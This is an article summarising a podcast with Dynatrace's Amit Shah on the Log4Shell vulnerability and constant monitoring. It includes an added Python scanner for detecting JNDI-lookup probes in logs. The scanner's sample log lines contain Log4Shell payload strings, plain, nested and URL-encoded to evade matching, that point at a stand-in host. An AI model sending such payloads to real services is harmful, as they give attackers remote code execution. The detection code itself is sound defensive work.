
How to Deal With Endemic Software Vulnerabilities

Amit Shah of Dynatrace on the Implications of Log4j, Need for Constant Monitoring
Exploitation of Log4Shell (CVE-2021-44228), a vulnerability in the popular Java logging library Apache Log4j, gives an unauthenticated attacker remote code execution on any internet-exposed service that logs attacker-controlled input through a vulnerable version of the library, wherever that library sits in the software stack.

Amit Shah is one of the early discoverers of Log4Shell, which the Cyber Safety Review Board, convened under the Cybersecurity and Infrastructure Security Agency, declared in July 2022 to be an "endemic vulnerability" that will keep resurfacing for years to come. Shah expects other flaws with similar consequences to follow.

In addition to patching these vulnerabilities, he recommends using runtime application protection, which he compares to "changing the locks to your house now that the burglar has keys." In fact, Shah says, nothing short of "constant monitoring of every single layer of your technology stack" - both IT and OT - is required to deal with vulnerabilities that arise because of the complexity of technology today.
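
The two points above, how a logged string becomes code execution and why the log layer itself has to be watched, can be made concrete. The following Python scanner is an added example, not code from the episode or from Dynatrace: it de-obfuscates the nested Log4j lookups (`${lower:..}`, `${upper:..}`, `${..:-default}`) that real probes used to evade naive `${jndi:` matching, then flags any line that resolves to a JNDI lookup. The access-log lines and IP addresses are constructed sample data.

```python
"""Detect Log4Shell (CVE-2021-44228) probes in log lines.

Added example, not part of the original article.  Log4j 2 (2.0-beta9 to
2.14.1) resolves "${...}" lookups inside logged strings, so a logged
"${jndi:ldap://host/x}" fetches and loads a remote class.  Attackers hide
the lookup behind nested lookups; this scanner unwinds the nesting much as
Log4j's own substitutor would, then searches the result for a JNDI lookup.
"""
import re
from urllib.parse import unquote

# Innermost lookup: a ${...} whose body contains no further "$", "{" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup and the provider scheme it targets (ldap, rmi, dns, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.I)


def _resolve(body: str) -> str:
    """Resolve one innermost lookup body.

    Only the transforms an exploit string uses to smuggle literals are
    modelled (an approximation, not a full Log4j StrSubstitutor): the
    lower/upper lookups and the "${name:-default}" fallback, including the
    "${::-x}" form with an empty name.  A JNDI lookup or any other
    unresolvable lookup is kept verbatim so the caller can match it.
    """
    prefix, sep, rest = body.partition(":")
    key = prefix.lower()
    if key.startswith("jndi"):
        return "${" + body + "}"
    if key == "lower" and sep:
        return rest.lower()
    if key == "upper" and sep:
        return rest.upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return "${" + body + "}"


def normalize(line: str) -> str:
    """URL-decode, then collapse nested lookups until nothing changes."""
    s = unquote(line)
    for _ in range(32):  # bound the work on adversarial input
        new = _INNER.sub(lambda m: _resolve(m.group(1)), s)
        if new == s:
            break
        s = new
    return s


def jndi_scheme(line: str):
    """Return the JNDI provider scheme a line resolves to, or None."""
    m = _JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


def scan_log(lines):
    """Return (1-based line number, scheme) for every line carrying a JNDI lookup."""
    return [(i, s) for i, line in enumerate(lines, 1) if (s := jndi_scheme(line))]


# Constructed sample access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:02:14:07 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:02:14:09 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:02:14:10 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${::-l}${::-d}ap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:02:14:11 +0000] "GET /api?q=%24%7B%24%7Benv%3ANaN%3A-j%7Dndi%3Armi%3A%2F%2F'
    '198.51.100.7%3A1099%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.12 - - [10/Dec/2021:02:14:12 +0000] "GET /docs/${version} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for lineno, scheme in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: JNDI lookup via {scheme} -> {normalize(SAMPLE_LOG[lineno - 1])}")
```

The third and fourth sample lines would slip past a plain `${jndi:` match (one is nested, the other URL-encoded in the request path), while the `${version}` literal on the last line is correctly left alone. A scanner like this is a detection aid for the monitoring Shah describes, not a substitute for upgrading Log4j: it only sees the fields that reach the log, so any input path that logs user-controlled data is a candidate for the same treatment.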

In this episode of "Cybersecurity Unplugged," Shah discusses:

  • The benefits of using open-source libraries and software as well as Kubernetes and the need for "observability into how things are running in production" to identify flaws arising from their use;
  • How digital transformation's imperative of "get things out the door faster" affects security;
  • The need for a "new approach that's going to bring everybody together, looking at the same set of data with a common understanding of what's important and what the threats are within your environment."

Shah, director of product marketing at Dynatrace, has worked with product marketing teams at Splunk and PayPal and has experience in technology roles ranging from software development to IT strategy.
